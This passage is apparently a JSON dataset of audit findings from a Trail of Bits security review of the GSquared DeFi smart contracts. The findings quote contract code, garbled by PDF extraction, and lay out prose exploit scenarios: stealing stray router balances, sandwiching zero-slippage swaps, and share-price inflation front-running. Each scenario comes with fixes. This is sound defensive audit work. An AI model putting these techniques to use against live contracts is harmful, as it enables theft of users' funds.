"https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The setOwner() function is used to change the owner of the PnLFixedRate contract. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes. function setOwner ( address _owner ) external { if ( msg.sender != owner) revert PnLErrors.NotOwner(); address previous_owner = msg.sender ; owner = _owner; emit LogOwnershipTransferred(previous_owner, _owner); 56 57 58 59 60 61 62 } Figure 2.1: contracts/pnl/PnLFixedRate:56-62 This issue can also be found in the following locations: contracts/pnl/PnL.sol:36-42 contracts/strategy/ConvexStrategy.sol:447-453 contracts/strategy/keeper/GStrategyGuard.sol:92-97 contracts/strategy/stop-loss/StopLossLogic.sol:73-78 Exploit Scenario The owner of the PnLFixedRate contract is a governance-controlled multisignature wallet. The community agrees to change the owner of the strategy, but the wrong address is mistakenly provided to its call to setOwner , permanently misconguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, review how critical operations are implemented across the codebase to make sure they are not error-prone.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Non-zero token balances in the GRouter can be stolen ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "A non-zero balance of 3CRV, DAI, USDC, or USDT in the router contract can be stolen by an attacker. The GRouter contract is the entrypoint for deposits into a tranche and withdrawals out of a tranche. A deposit involves depositing a given number of a supported stablecoin (USDC, DAI, or USDT); converting the deposit, through a series of operations, into G3CRV, the protocols ERC4626-compatible vault token; and depositing the G3CRV into a tranche. Similarly, for withdrawals, the user burns their G3CRV that was in the tranche and, after a series of operations, receives back some amount of a supported stablecoin (gure 3.1). ERC20( address (tranche.getTrancheToken(_tranche))).safeTransferFrom( ); // withdraw from tranche // index is zero for ETH mainnet as their is just one yield token // returns usd value of withdrawal ( uint256 vaultTokenBalance , ) = tranche.withdraw( function withdrawFromTrancheForCaller ( msg.sender , address ( this ), _amount uint256 _amount , uint256 _token_index , bool _tranche , uint256 _minAmount 421 422 423 424 425 426 ) internal returns ( uint256 amount ) { 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 _amount, 0 , _tranche, address ( this ) vaultTokenBalance, address ( this ), address ( this ) ); ); // withdraw underlying from GVault uint256 underlying = vaultToken.redeem( 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 } // remove liquidity from 3crv to get desired stable from curve threePool.remove_liquidity_one_coin( underlying, int128 ( uint128 (_token_index)), //value should always be 0,1,2 0 ); ERC20 stableToken = ERC20(routerOracle.getToken(_token_index)); amount = stableToken.balanceOf( address ( this )); if (amount < _minAmount) { revert Errors.LTMinAmountExpected(); } // send stable to user stableToken.safeTransfer( msg.sender , amount); emit LogWithdrawal( msg.sender , _amount, _token_index, _tranche, amount); Figure 3.1: The withdrawFromTrancheForCaller function in GRouter.sol#L421-468 However, notice that during withdrawals the amount of stableTokens that will be transferred back to the user is a function of the current stableToken balance of the contract (see the highlighted line in gure 3.1). In the expected case, the balance should be only the tokens received from the threePool.remove_liquidity_one_coin swap (see L450 in gure 3.1). However, a non-zero balance could also occur if a user airdrops some tokens or they transfer tokens by mistake instead of calling the expected deposit or withdraw functions. As long as the attacker has at least 1 wei of G3CRV to burn, they are capable of withdrawing the whole balance of stableToken from the contract, regardless of how much was received as part of the threePool swap. A similar situation can happen with deposits. A non-zero balance of G3CRV can be stolen as long as the attacker has at least 1 wei of either DAI, USDC, or USDT. Exploit Scenario Alice mistakenly sends a large amount of DAI to the GRouter contract instead of calling the deposit function. Eve notices that the GRouter contract has a non-zero balance of DAI and calls withdraw with a negligible balance of G3CRV. Eve is able to steal Alice's DAI at a very small cost. Recommendations Short term, consider using the dierence between the contracts pre- and post-balance of stableToken for withdrawals, and depositAmount for deposits, in order to ensure that only the newly received tokens are used for the operations. Long term, create an external skim function that can be used to skim any excess tokens in the contract. Additionally, ensure that the user documentation highlights that users should not transfer tokens directly to the GRouter and should instead use the web interface or call the deposit and withdraw functions. Finally, ensure that token airdrops or unexpected transfers can only benet the protocol.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "4. Uninformative implementation of maxDeposit and maxMint from EIP-4626 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The GVault implementation of EIP-4626 is uninformative for maxDeposit and maxMint, as they return only xed, extreme values. EIP-4626 is a standard to implement tokenized vaults. In particular, the following is specied: maxDeposit : MUST factor in both global and user-specic limits, like if deposits are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. maxMint : MUST factor in both global and user-specic limits, like if mints are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. The current implementation of maxDeposit and maxMint in the GVault contract directly return the maximum value of the uint256 type: /// @notice The maximum amount a user can deposit into the vault function maxDeposit ( address ) public pure override returns ( uint256 maxAssets ) return type( uint256 ).max; 293 294 295 296 297 298 299 { 300 301 } . . . 315 316 317 318 } /// @notice maximum number of shares that can be minted function maxMint ( address ) public pure override returns ( uint256 maxShares ) { return type( uint256 ).max; Figure 4.1: The maxDeposit and maxMint functions from GVault.sol This implementation, however, does not provide any valuable information to the user and may lead to faulty integrations with third-party systems. Exploit Scenario A third-party protocol wants to deposit into a GVault . It rst calls maxDeposit to know the maximum amount of asserts it can deposit and then calls deposit . However, the latter function call will revert because the value is too large. Recommendations Short term, return suitable values in maxDeposit and maxMint by considering the amount of assets owned by the caller as well any other global condition (e.g., a contract is paused). Long term, ensure compliance with the EIP specication that is being implemented (in this case, EIP-4626).", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "5. moveStrategy runs of out gas for large inputs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Reordering strategies can trigger operations that will run out-of-gas before completion. A GVault contract allows dierent strategies to be added into a queue. Since the order of them is important, the contract provides moveStrategy , a function to let the owner to move a strategy to a certain position of the queue. 500 501 502 503 504 505 506 507 508 509 510 511 } /// @notice Move the strategy to a new position /// @param _strategy Target strategy to move /// @param _pos desired position of strategy /// @dev if the _pos value is >= number of strategies in the queue, /// the strategy will be moved to the tail position function moveStrategy ( address _strategy , uint256 _pos ) external onlyOwner { uint256 currentPos = getStrategyPositions(_strategy); uint256 _strategyId = strategyId[_strategy]; if (currentPos > _pos) move( uint48 (_strategyId), uint48 (currentPos - _pos), false ); else move( uint48 (_strategyId), uint48 (_pos - currentPos), true ); Figure 5.1: The moveStrategy function from GVault.sol The documentation states that if the position to move a certain strategy is larger than the number of strategies in the queue, then it will be moved to the tail of the queue. This implemented using the move function: 171 172 173 174 175 176 177 178 179 180 181 182 ) internal { /// @notice move a strategy to a new position in the queue /// @param _id id of strategy to move /// @param _steps number of steps to move the strategy /// @param _back move towards tail (true) or head (false) /// @dev Moves a strategy a given number of steps. If the number /// of steps exceeds the position of the head/tail, the /// strategy will take the place of the current head/tail function move ( uint48 _id , uint48 _steps , bool _back 183 184 185 186 187 188 189 190 Strategy storage oldPos = nodes[_id]; if (_steps == 0 ) return ; if (oldPos.strategy == ZERO_ADDRESS) revert NoIdEntry(_id); uint48 _newPos = !_back ? oldPos.prev : oldPos.next; for ( uint256 i = 1 ; i < _steps; i++) { _newPos = !_back ? nodes[_newPos].prev : nodes[_newPos].next; } Figure 5.2: The header of the move function from StrategyQueue.sol However, if a large number of steps is used, the loop will never nish without running out of gas. A similar issue aects StrategyQueue.withdrawalQueue , if called directly. Exploit Scenario Alice creates a smart contract that acts as the owner of a GVault. She includes code to reorder strategies using a call to moveStrategy . Since she wants to ensure that a certain strategy is always moved to the end of the queue, she uses a very large value as the position. When the code runs, it will always run out of gas, blocking the operation. Recommendations Short term, ensure the execution of the move ends in a number of steps that is bounded by the number of strategies in the queue. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. GVault withdrawals from ConvexStrategy are vulnerable to sandwich attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Token swaps that may be executed during vault withdrawals are vulnerable to sandwich attacks. Note that this is applicable only if a user withdraws directly from the GVault , not through the GRouter contract. The ConvexStrategy contract performs token swaps through Uniswap V2, Uniswap V3, and Curve. All platforms allow the caller to specify the minimum-amount-out value, which indicates the minimum amount of tokens that a user wishes to receive from a swap. This provides protection against illiquid pools and sandwich attacks. Many of the swaps that the ConvexStrategy contract performs have the minimum-amount-out value hardcoded to zero. But a majority of these swaps can be triggered only by a Gelato keeper, which uses a private channel to relay all transactions. Thus, these swaps cannot be sandwiched. However, this is not the case with the ConvexStrategy.withdraw function. The withdraw function will be called by the GVault contract if the GVault does not have enough tokens for a user withdrawal. If the balance is not sucient, ConvexStrategy.withdraw will be called to retrieve additional assets to complete the withdrawal request. Note that the transaction to withdraw assets from the protocol will be visible in the public mempool (gure 6.1). function withdraw ( uint256 _amount ) 771 772 773 774 { 775 776 777 778 779 780 781 782 783 784 785 external returns ( uint256 withdrawnAssets , uint256 loss ) if ( msg.sender != address (VAULT)) revert StrategyErrors.NotVault(); ( uint256 assets , uint256 balance , ) = _estimatedTotalAssets( false ); // not enough assets to withdraw if (_amount >= assets) { balance += sellAllRewards(); balance += divestAll( false ); if (_amount > balance) { loss = _amount - balance; withdrawnAssets = balance; } else { withdrawnAssets = _amount; 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 } } } else { // check if there is a loss, and distribute it proportionally // if it exists uint256 debt = VAULT.getStrategyDebt(); if (debt > assets) { loss = ((debt - assets) * _amount) / debt; _amount = _amount - loss; } if (_amount <= balance) { withdrawnAssets = _amount; } else { withdrawnAssets = divest(_amount - balance, false ) + balance; if (withdrawnAssets < _amount) { loss += _amount - withdrawnAssets; } else { if (loss > withdrawnAssets - _amount) { loss -= withdrawnAssets - _amount; } else { loss = 0 ; } } } } ASSET.transfer( msg.sender , withdrawnAssets); return (withdrawnAssets, loss); Figure 6.1: The withdraw function in ConvexStrategy.sol#L771-812 In the situation where the _amount that needs to be withdrawn is more than or equal to the total number of assets held by the contract, the withdraw function will call sellAllRewards and divestAll with _ slippage set to false (see the highlighted portion of gure 6.1). The sellAllRewards function, which will call _sellRewards , sells all the additional reward tokens provided by Convex, its balance of CRV, and its balance of CVX for WETH. All these swaps have a hardcoded value of zero for the minimum-amount-out. Similarly, if _ slippage is set to false when calling divestAll , the swap species a minimum-amount-out of zero. By specifying zero for all these token swaps, there is no guarantee that the protocol will receive any tokens back from the trade. For example, if one or more of these swaps get sandwiched during a call to withdraw , there is an increased risk of reporting a loss that will directly aect the amount the user is able to withdraw. Exploit Scenario Alice makes a call to withdraw to remove some of her funds from the protocol. Eve notices this call in the public transaction mempool. Knowing that the contract will have to sell some of its rewards, Eve identies a pure prot opportunity and sandwiches one or more of the swaps performed during the transaction. The strategy now has to report a loss, which results in Alice receiving less than she would have otherwise. Recommendations Short term, for _sellRewards , use the same minAmount calculation as in divestAll but replace debt with the contracts balance of a given reward token. This can be applied for all swaps performed in _sellRewards . For divestAll , set _slippage to true instead of false when it is called in withdraw . Long term, document all cases in which front-running may be possible and its implications for the codebase. Additionally, ensure that all users are aware of the risks of front-running and arbitrage when interacting with the GSquared system.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "7. Stop loss primer cannot be deactivated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The stop loss primer cannot be deactivated because the keeper contract uses the incorrect function to check whether or not the meta pool has become healthy again. The stop loss primer is activated if the meta pool that is being used for yield becomes unhealthy. A meta pool is unhealthy if the price of the 3CRV token deviates from the expected price for a set amount of time. The primer can also be deactivated if, after it has been activated, the price of the token stabilizes back to a healthy value. Deactivating the primer is a critical feature because if the pool becomes healthy again, there is no reason to divest all of the strategys funds, take potential losses, and start all over again. The GStrategyResolver contract, which is called by a Gelato keeper, will check to identify whether a primer can be deactivated. This is done via the taskStopStopLossPrimer function. The function will attempt to call the GStrategyGuard.endStopLoss function to see whether the primer can be deactivated (gure 7.1). function taskStopStopLossPrimer () external view returns ( bool canExec , bytes memory execPayload) IGStrategyGuard executor = IGStrategyGuard(stopLossExecutor); if (executor.endStopLoss()) { canExec = true ; execPayload = abi.encodeWithSelector( executor.stopStopLossPrimer.selector ); } 46 47 48 49 50 { 51 52 53 54 55 56 57 58 } Figure 7.1: The taskStopStopLossPrimer function in GStrategyResolver.sol#L46-58 However, the GStrategyGuard contract does not have an endStopLoss function. Instead, it has a canEndStopLoss function. Note that the executor variable in taskStopStopLossPrimer is expected to implement the IGStrategyGuard function, which does have an endStopLoss function. However, the GStrategyGuard contract implements the IGuard interface, which does not have the endStopLoss function. Thus, the call to endStopLoss will simply return, which is equivalent to returning false , and the primer will not be deactivated. Exploit Scenario Due to market conditions, the price of the 3CRV token drops signicantly for an extended period of time. This triggers the Gelato keeper to activate the stop loss primer. Soon after, the price of the 3CRV token restabilizes. However, because of the incorrect function call in the taskStopStopLossPrimer function, the primer cannot be deactivated, the stop loss process completes, and all the funds in the strategy must be divested. Recommendations Short term, change the function call from endStopLoss to canEndStopLoss in taskStopStopLossPrimer . Long term, ensure that there are no near-duplicate interfaces for a given contract in the protocol that may lead to an edge case similar to this. Additionally, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "8. getYieldTokenAmount uses convertToAssets instead of convertToShares ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The getYieldTokenAmount function does not properly convert a 3CRV token amount into a G3CRV token amount, which may allow a user to withdraw more or less than expected or lead to imbalanced tranches after a migration. The expected behavior of the getYieldTokenAmount function is to return the number of G3CRV tokens represented by a given 3CRV amount. For withdrawals, this will determine how many G3CRV tokens should be returned back to the GRouter contract. For migrations, the function is used to gure out how many G3CRV tokens should be allocated to the senior and junior tranches. To convert a given amount of 3CRV to G3CRV, the GVault.convertToShares function should be used. However, the getYieldTokenAmount function uses the GVault.convertToAssets function (gure 8.1). Thus, getYieldTokenAmount takes an amount of 3CRV tokens and treats it as shares in the GVault , instead of assets. 169 170 171 172 173 { 174 175 } function getYieldTokenAmount ( uint256 _index , uint256 _amount ) internal view returns ( uint256 ) return getYieldToken(_index).convertToAssets(_amount); Figure 8.1: The getYieldTokenAmount function in GTranche.sol#L169-175 If the system is protable, each G3CRV share should be worth more over time. Thus, getYieldTokenAmount will return a value larger than expected because one share is worth more than one asset. This allows a user to withdraw more from the GTranche contract than they should be able to. Additionally, a protable system will cause the senior tranche to receive more G3CRV tokens than expected during migrations. A similar situation can happen if the system is not protable. Exploit Scenario Alice deposits $100 worth of USDC into the system. After a certain amount of time, the GSquared protocol becomes protable and Alice should be able to withdraw $110, making $10 in prot. However, due to the incorrect arithmetic performed in the getYieldTokenAmount function, Alice is able to withdraw $120 of USDC. Recommendations Short term, use convertToShares instead of convertToAssets in getYieldTokenAmount . Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "9. convertToShares can be manipulated to block deposits ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "An attacker can block operations by using direct token transfers to manipulate convertToShares , which computes the amount of shares to deposit. convertToShares is used in the GVault code to know how many shares correspond to certain amount of assets: 394 395 396 397 398 399 400 401 { 402 /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares ( uint256 _assets ) public view override returns ( uint256 shares ) uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. 403 404 } return freeFunds_ == 0 ? _assets : (_assets * totalSupply) / freeFunds_; Figure 9.1: The convertToShares function in GVault.sol This function relies on the _freeFunds function to calculate the amount of shares: 706 707 708 709 710 } /// @notice the number of total assets the GVault has excluding and profits /// and losses function _freeFunds () internal view returns ( uint256 ) { return _totalAssets() - _calculateLockedProfit(); Figure 9.2: The _freeFunds function in GVault.sol In the simplest case, _calculateLockedProfit() can be assumed as zero if there is no locked prot. The _totalAssets function is implemented as follows: 820 821 /// @notice Vault adapters total assets including loose assets and debts /// @dev note that this does not consider estimated gains/losses from the strategies 822 823 824 } function _totalAssets () private view returns ( uint256 ) { return asset.balanceOf( address ( this )) + vaultTotalDebt; Figure 9.3: The _totalAssets function in GVault.sol However, the fact that _totalAssets has a lower bound determined by asset.balanceOf(address(this)) can be exploited to manipulate the result by \"donating\" assets to the GVault address. Exploit Scenario Alice deploys a new GVault. Eve observes the deployment and quickly transfers an amount of tokens to the GVault address. One of two scenarios can happen: 1. 2. Eve transfers a minimal amount of tokens, forcing a positive amount of freeFunds . This will block any immediate calls to deposit, since it will result in zero shares to be minted. Eve transfers a large amount of tokens, forcing future deposits to be more expensive or resulting in zero shares. Every new deposit can increase the amount of free funds, making the eect more severe. It is important to note that although Alice cannot use the deposit function, she can still call mint to bypass the exploit. Recommendations Short term, use a state variable, assetBalance , to track the total balance of assets in the contract. Avoid using balanceOf , which is prone to manipulation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "10. Harvest operation could be blocked if eligibility check on a strategy reverts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "During harvest, if any of the strategies in the queue were to revert, it would prevent the loop from reaching the end of the queue and also block the entire harvest operation. When the harvest function is executed, a loop iterates through each of the strategies in the strategies queue, and the canHarvest() check runs on each strategy to determine if it is eligible for harvesting; if it is, the harvest logic is executed on that strategy. 312 313 314 315 316 317 318 319 320 321 322 /// @notice Execute strategy harvest function harvest () external { if ( msg.sender != keeper) revert GuardErrors.NotKeeper(); uint256 strategiesLength = strategies.length; for ( uint256 i ; i < strategiesLength; i++) { address strategy = strategies[i]; if (strategy == address ( 0 )) continue ; if (IStrategy(strategy).canHarvest()) { if (strategyCheck[strategy].active) { IStrategy(strategy).runHarvest(); try IStrategy(strategy).runHarvest() {} catch Error( ... Figure 10.1: The harvest function in GStrategyGuard.sol However, if the canHarvest() check on a particular strategy within the loop reverts, external calls from the canHarvest() function to check the status of rewards could also revert. Since the call to canHarvest() is not inside of a try block, this would prevent the loop from proceeding to the next strategy in the queue (if there is one) and would block the entire harvest operation. Additionally, within the harvest function, the runHarvest function is called twice on a strategy on each iteration of the loop. This could lead to unnecessary waste of gas and possibly undened behavior. Recommendations Short term, wrap external calls within the loop in try and catch blocks, so that reverts can be handled gracefully without blocking the entire operation. Additionally, ensure that the canHarvest function of a strategy can never revert. Long term, carefully audit operations that consume a large amount of gas, especially those in loops. Additionally, when designing logic loops that make external calls, be mindful as to whether the calls can revert, and wrap them in try and catch blocks when necessary.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "11. Incorrect rounding direction in GVault ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The minting and withdrawal operations in the GVault use rounding in favor of the user instead of the protocol, giving away a small amount of shares or assets that can accumulate over time . convertToShares is used in the GVault code to know how many shares correspond to a certain amount of assets: 394 395 396 397 398 399 400 401 { 402 /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares ( uint256 _assets ) public view override returns ( uint256 shares ) uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. 403 404 } return freeFunds_ == 0 ? _assets : (_assets * totalSupply) / freeFunds_; Figure 11.1: The convertToShares function in GVault.sol This function rounds down, providing slightly fewer shares than expected for some amount of assets. Additionally, convertToAssets i s used in the GVault code to know how many assets correspond to certain amount of shares: 406 /// @notice Value of shares in underlying asset /// @param _shares amount of shares to convert to tokens function convertToAssets ( uint256 _shares ) 407 408 409 410 411 412 413 { public view override returns ( uint256 assets ) 414 uint256 _totalSupply = totalSupply; // Saves an extra SLOAD if _totalSupply is non-zero. 415 416 417 418 419 } return _totalSupply == 0 ? _shares : ((_shares * _freeFunds()) / _totalSupply); Figure 11.2: The convertToAssets function in GVault.sol This function also rounds down, providing slightly fewer assets than expected for some amount of shares. However, the mint function uses previewMint , which uses convertToAssets : 204 205 206 207 208 209 { 210 211 212 213 214 215 216 217 218 219 220 } function mint ( uint256 _shares , address _receiver ) external override nonReentrant returns ( uint256 assets ) // Check for rounding error in previewMint. if ((assets = previewMint(_shares)) == 0 ) revert Errors.ZeroAssets(); _mint(_receiver, _shares); asset.safeTransferFrom( msg.sender , address ( this ), assets); emit Deposit( msg.sender , _receiver, assets, _shares); return assets; Figure 12.3: The mint function in GVault.sol This means that the function favors the user, since they get some xed amount of shares for a rounded-down amount of assets. In a similar way, the withdraw function uses convertToShares : function withdraw ( uint256 _assets , address _receiver , address _owner 227 228 229 230 231 ) external override nonReentrant returns ( uint256 shares ) { 232 if (_assets == 0 ) revert Errors.ZeroAssets(); 233 234 235 236 shares = convertToShares(_assets); if (shares > balanceOf[_owner]) revert Errors.InsufficientShares(); 237 238 239 if ( msg.sender != _owner) { uint256 allowed = allowance[_owner][ msg.sender ]; // Saves gas for limited approvals. 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 } if (allowed != type( uint256 ).max) allowance[_owner][ msg.sender ] = allowed - shares; } _assets = beforeWithdraw(_assets, asset); _burn(_owner, shares); asset.safeTransfer(_receiver, _assets); emit Withdraw( msg.sender , _receiver, _owner, _assets, shares); return shares; Figure 11.4: The withdraw function in GVault.sol This means that the function favors the user, since they get some xed amount of assets for a rounded-down amount of shares. This issue should also be also considered when minting fees, since they should favor the protocol instead of the user or the strategy. Exploit Scenario Alice deploys a new GVault and provides some liquidity. Eve uses mints and withdrawals to slowly drain the liquidity, possibly aecting the internal bookkeeping of the GVault. Recommendations Short term, consider refactoring the GVault code to specify the rounding direction across the codebase in order keep the error in favor of the user or the protocol. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "12. Protocol migration is vulnerable to front-running and a loss of funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The migration from Gro protocol to GSquared protocol can be front-run by manipulating the share price enough that the protocol loses a large amount of funds. The GMigration contract is responsible for initiating the migration from Gro to GSquared. The G Migration.prepareMigration function will deposit liquidity into the three-pool and then attempt to deposit the 3CRV LP token into the GVault contract in exchange for G3CRV shares (gure 12.1). Note that this migration occurs on a newly deployed GVault contract that holds no assets and has no supply of shares. 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 function prepareMigration ( uint256 minAmountThreeCRV ) external onlyOwner { if (!IsGTrancheSet) { revert Errors.TrancheNotSet(); } // read senior tranche value before migration seniorTrancheDollarAmount = SeniorTranche(PWRD).totalAssets(); uint256 DAI_BALANCE = ERC20(DAI).balanceOf( address ( this )); uint256 USDC_BALANCE = ERC20(USDC).balanceOf( address ( this )); uint256 USDT_BALANCE = ERC20(USDT).balanceOf( address ( this )); // approve three pool ERC20(DAI).safeApprove(THREE_POOL, DAI_BALANCE); ERC20(USDC).safeApprove(THREE_POOL, USDC_BALANCE); ERC20(USDT).safeApprove(THREE_POOL, USDT_BALANCE); // swap for 3crv IThreePool(THREE_POOL).add_liquidity( [DAI_BALANCE, USDC_BALANCE, USDT_BALANCE], minAmountThreeCRV ); //check 3crv amount received uint256 depositAmount = ERC20(THREE_POOL_TOKEN).balanceOf( address ( this ) ); // approve 3crv for GVault ERC20(THREE_POOL_TOKEN).safeApprove( address (gVault), depositAmount); // deposit into GVault uint256 shareAmount = gVault.deposit(depositAmount, address ( this )); // approve gVaultTokens for gTranche ERC20( address (gVault)).safeApprove( address (gTranche), shareAmount); 89 90 91 92 93 94 95 96 97 98 } } Figure 12.1: The prepareMigration function in GMigration.sol#L61-98 However, this prepareMigration function call is vulnerable to a share price ination attack. As noted in this issue , the end result of the attack is that the shares (G3CRV) that the GMigration contract will receive can redeem only a portion of the assets that were originally deposited by GMigration into the GVault contract. This occurs because the rst depositor in the GVault is capable of manipulating the share price signicantly, which is compounded by the fact that the deposit function in GVault rounds in favor of the protocol due to a division in convertToShares (see TOB-GRO-11 ). Exploit Scenario Alice, a GSquared developer, calls prepareMigration to begin the process of migrating funds from Gro to GSquared. Eve notices this transaction in the public mempool, and front-runs it with a small deposit and a large token (3CRV) airdrop. This leads to a signicant change in the share price. The prepareMigration call completes, but GMigration is left with a small, insucient amount of shares because it has suered from truncation in the convertToShares function. These shares can be redeemed for only a portion of the original deposit. Recommendations Short term, perform the GSquared system deployment and protocol migration using a private relay. This will mitigate the risk of front-running the migration or price share manipulation. Long term, implement the short- and long-term recommendations outlined in TOB-GRO-11 . Additionally, implement an ERC4626Router similar to Fei protocols implementation so that a minimum-amount-out can be specied for deposit, mint, redeem, and withdraw operations. References ERC4626RouterBase.sol ERC4626 share price ination", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "13. Incorrect slippage calculation performed during strategy investments and divestitures ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The incorrect arithmetic calculation for slippage tolerance during strategy investments and divestitures can lead to an increased rate of failed prot-and-loss (PnL) reports and withdrawals. The ConvexStrategy contract is tasked with investing excess funds into a meta pool to obtain yield and divesting those funds from the pool whenever necessary. Investments are done via the invest function, and divestitures for a given amount are done via the divest function. Both functions have the ability to manage the amount of slippage that is allowed during the deposit and withdrawal from the meta pool. For example, in the divest function, the withdrawal will go through only if the amount of 3CRV tokens that will be transferred out from the pool (by burning meta pool tokens) is greater than or equal to the _debt , the amount of 3CRV that needs to be transferred out from the pool, discounted by baseSlippage (gure 13.1). Thus, both sides of the comparison must have units of 3CRV. 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 function divest ( uint256 _debt , bool _slippage ) internal returns ( uint256 ) { uint256 meta_amount = ICurveMeta(metaPool).calc_token_amount( [ 0 , _debt], false ); if (_slippage) { uint256 ratio = curveValue(); if ( (meta_amount * PERCENTAGE_DECIMAL_FACTOR) / ratio < ((_debt * (PERCENTAGE_DECIMAL_FACTOR - baseSlippage)) / PERCENTAGE_DECIMAL_FACTOR) revert StrategyErrors.LTMinAmountExpected(); ) { } } Rewards(rewardContract).withdrawAndUnwrap(meta_amount, false ); return ICurveMeta(metaPool).remove_liquidity_one_coin( meta_amount, CRV3_INDEX, 904 905 } ); Figure 13.1: The divest function in ConvexStrategy.sol#L883-905 To calculate the value of a meta pool token (mpLP) in terms of 3CRV, the curveValue function is called (gure 13.2). The units of the return value, ratio , are 3CRV/mpLP. 1170 1171 1172 1173 1174 } function curveValue () internal view returns ( uint256 ) { uint256 three_pool_vp = ICurve3Pool(CRV_3POOL).get_virtual_price(); uint256 meta_pool_vp = ICurve3Pool(metaPool).get_virtual_price(); return (meta_pool_vp * PERCENTAGE_DECIMAL_FACTOR) / three_pool_vp; Figure 13.2: The curveValue function in ConvexStrategy.sol#L1170-1174 However, note that in gure 13.1, meta_amount value, which is the amount of mpLP tokens that need to be burned, is divided by ratio . From a unit perspective, this is multiplying an mpLP amount by a mpLP/3CRV ratio. The resultant units are not 3CRV. Instead, the arithmetic should be meta_amount multiplied by ratio. This would be mpLP times 3CRV/mpLP, which would result in the nal units of 3CRV. Assuming 3CRV/mpLP is greater than one, the division instead of multiplication will result in a smaller value, which increases the likelihood that the slippage tolerance is not met. The invest and divest functions are called during PnL reporting and withdrawals. If there is a higher risk for the functions to revert because the slippage tolerance is not met, the likelihood of failed PnL reports and withdrawals also increases. Exploit Scenario Alice wishes to withdraw some funds from the GSquared protocol. She calls GRouter.withdraw and with a reasonable minAmount . The GVault contract calls the ConvexStrategy contract to withdraw some funds to meet the necessary withdrawal amount. The strategy attempts to divest the necessary amount of funds. However, due to the incorrect slippage arithmetic, the divest function reverts and Alices withdrawal is unsuccessful. Recommendations Short term, in divest , multiply meta_amount by ratio . In invest , multiply amount by ratio . Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "14. Potential division by zero in _calcTrancheValue ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Junior tranche withdrawals may fail due to an unexpected division by zero error. One of the key steps performed during junior tranche withdrawals is to identify the dollar value of the tranche tokens that will be burned by calling _calcTrancheValue (gure 14.1). function _calcTrancheValue ( bool _tranche , uint256 _amount , uint256 _total 559 560 561 562 563 ) public view returns ( uint256 ) { 564 565 566 567 568 } uint256 factor = getTrancheToken(_tranche).factor(_total); uint256 amount = (_amount * DEFAULT_FACTOR) / factor; if (amount > _total) return _total; return amount; Figure 14.1: The _calcTrancheValue function in GTranche.sol#L559-568 To calculate the dollar value, the factor function is called to identify how many tokens represent one dollar. The dollar value, amount , is then the token amount provided, _amount , divided by factor . However, an edge case 